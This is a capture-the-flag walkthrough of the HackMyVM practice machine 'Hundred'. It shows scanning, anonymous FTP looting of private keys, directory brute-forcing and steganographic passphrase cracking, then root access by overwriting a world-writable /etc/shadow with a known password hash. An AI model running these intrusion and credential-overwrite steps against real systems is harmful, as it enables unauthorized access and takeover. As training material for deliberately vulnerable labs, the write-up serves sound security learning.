Hundred – Writeup – HackMyVM – Walkthrough

Hundred is an easy machine from HackMyVM. The author of the machine is SML and he created it to celebrate 100 machines on the platform. The machine is pretty easy but requires a few special techniques to get to the root. “Hundred – Writeup – HackMyVM – Walkthrough”

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Hundred

Identify the target

Firstly, I identified the IP address of the target.

fping -aqg 10.0.0.0/24
The IP address of the target is 10.0.0.14

Scan open ports

Next, I scanned the open ports to know the exposed services on the target.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.14
Nmap scan results

From the nmap scan results, we see that ports 21, 22 and 80 are open. Furthermore, we have anonymous access to the FTP server. Likewise, there are files that look like private keys. So, I logged into the FTP server anonymously and downloaded all the files.

Anonymous access to FTP

I like to use lftp as a FTP client.

lftp -u anonymous, 10.0.0.14

# in client
mget *
The files on the FTP server

id_rsa is a fake private key and it just has a bunny on it.

The content of id_rsa

However, id _rsa.pem looks like a genuine private key.

The content of id_rsa.pem file

Similarly, on the users.txt file, we have some users from the HackMyVM platform. However, at the bottom of the file, there is a possible username as ‘hmv’.

The content of users.txt file

Anyway, the private key didn’t work for the user. So, I further looked at the webserver.

Enumerate the webserver

On the page source of the website, we see some information.

Page source of the website

The page as a whole informs us that there is a directory that we can get by using the key. Also, we might also get some information by doing steganography from the logo.jpg file. Back to the key, we can encode information by using an RSA private key using OpenSSL rsautl. Upon encoding the information we get a file that might be what we are seeing on the CSS style. Hence, I checked if the file exists or not.

wget http://10.0.0.14/h4ckb1tu5.enc
The encoded file is downloaded

I downloaded the file and performed the following command that uses the private key that I downloaded.

openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key
cat key
A path is encrypted using the private key
The path shows nothing

Here, we don’t see anything on the path and I performed the bruteforcing.

gobuster dir -r -u http://10.0.0.14/softyhackb4el7dshelldredd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -o dir-softyhack.log
The paths on the newly found directory

Here, we have another file that looks like a private key.

wget http://10.0.0.14/softyhackb4el7dshelldredd/id_rsa -O id_rsa
chmod 600 id_rsa

However, when I tried logging in as the user hmv, it asked me for the passphrase. Therefore, I have to find it. As I said earlier, we have a logo.jpg file that we can perform steganography and file information from there. The rockyou.txt didn’t work, but the users.txt file had the passphrase.

wget http://10.0.0.14/logo.jpg
stegseek logo.jpg users.txt -xf output
cat output
The passphrase is extracted from the logo.jpg file
SSH shell of hmv

Root privilege escalation

The root privilege escalation is also easy in this machine. The /etc/shadow file is writable by everyone. Thus, I could update the file to get the password of the root.

The file permissions on the /etc/shadow file

Since we don’t have read access to the file, we have to overwrite it. Also, please check the following link to understand a shadow file.

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Thus, I updated the password to “root” as follows.

openssl passwd # enter new password "root"
echo root:ZY300BQ.Lbmo6:18844:0:99999:7::: > /etc/shadow
su -l
The root shell

Check my walkthrough of ICMP from Vulnhub.

5 1 vote
Article Rating
Subscribe
Notify of
guest
6 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments